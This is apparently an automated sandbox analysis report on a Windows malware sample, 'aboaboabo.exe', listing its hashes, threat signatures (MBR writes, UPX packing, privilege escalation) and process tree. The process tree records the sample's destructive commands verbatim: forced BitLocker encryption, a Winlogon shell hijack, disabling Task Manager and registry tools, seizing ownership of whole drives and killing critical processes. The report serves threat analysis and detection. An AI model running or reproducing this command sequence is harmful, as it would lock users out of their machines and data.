Overview

overview

8

Static

static

5

aboaboabo.exe

windows11-21h2-x64

Analysis

  • max time kernel
    0s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241023-en
  • resource tags

    arch:x64arch:x86image:win11-20241023-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    27-11-2024 09:38

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    aboaboabo.exe

  • Size

    102KB

  • MD5

    099d08e56a00ee754ca42a63f03f3bf0

  • SHA1

    9cd9254c2d43b3f660a72046161f47e7249bcd5f

  • SHA256

    0e01c4845c1a6d26bd24549fb0bd493a9c037c44b6c450ba6e68bb8f01287e35

  • SHA512

    bc39bd4b5e8c0f2b50f3c1b0ccfe56023f4dc2f8df669285e4d5a203f74da7a83d49181d2705252d944655a29656f10a25e13bbdcb127bf075aa12046f4f1f88

  • SSDEEP

    1536:I7pLfBYvvrb8v20GiIPzW8WQVvB2UTsa0imYFU47o9Tuui:IpLmvPK207GcQlIvYFx7oZo

Score
8/10
bootkitdiscoveryexploitpersistenceupx

Malware Config

Signatures

  • Possible privilege escalation attempt 4 IoCs
    exploit
  • Modifies file permissions 1 TTPs 4 IoCs
    discovery
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

    bootkitpersistence
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Kills process with taskkill 2 IoCs
    evasion
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\aboaboabo.exe
    "C:\Users\Admin\AppData\Local\Temp\aboaboabo.exe"
    1⤵
    • Writes to the Master Boot Record (MBR)
    • Suspicious use of WriteProcessMemory
    PID:2480
    • C:\Windows\SYSTEM32\manage-bde.exe
      manage-bde -on C: -EncryptionMethod AES-256
      2⤵
        PID:2820
      • C:\Windows\SYSTEM32\reg.exe
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "TASKKILL /F /IM svchost.exe && shutdown /r /f /t 0" /f
        2⤵
          PID:3552
        • C:\Windows\SYSTEM32\reg.exe
          reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
          2⤵
            PID:2112
          • C:\Windows\SYSTEM32\reg.exe
            reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
            2⤵
              PID:1640
            • C:\Windows\SYSTEM32\takeown.exe
              takeown /f D:\ /r /d Y
              2⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:2528
            • C:\Windows\SYSTEM32\icacls.exe
              icacls D:\ /grant Everyone:F /t /c /l
              2⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:3908
            • C:\Windows\SYSTEM32\takeown.exe
              takeown /f C:\ /r /d Y
              2⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:4584
            • C:\Windows\SYSTEM32\icacls.exe
              icacls C:\ /grant Everyone:F /t /c /l
              2⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:2100
            • C:\Windows\SYSTEM32\taskkill.exe
              taskkill /F /T /IM LsaIso.exe
              2⤵
              • Kills process with taskkill
              PID:1988
            • C:\Windows\SYSTEM32\taskkill.exe
              taskkill /F /T /IM svchost.exe
              2⤵
              • Kills process with taskkill
              PID:3656

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • memory/2480-0-0x00007FF7B7980000-0x00007FF7B79B1000-memory.dmp

            Filesize

            196KB

            Download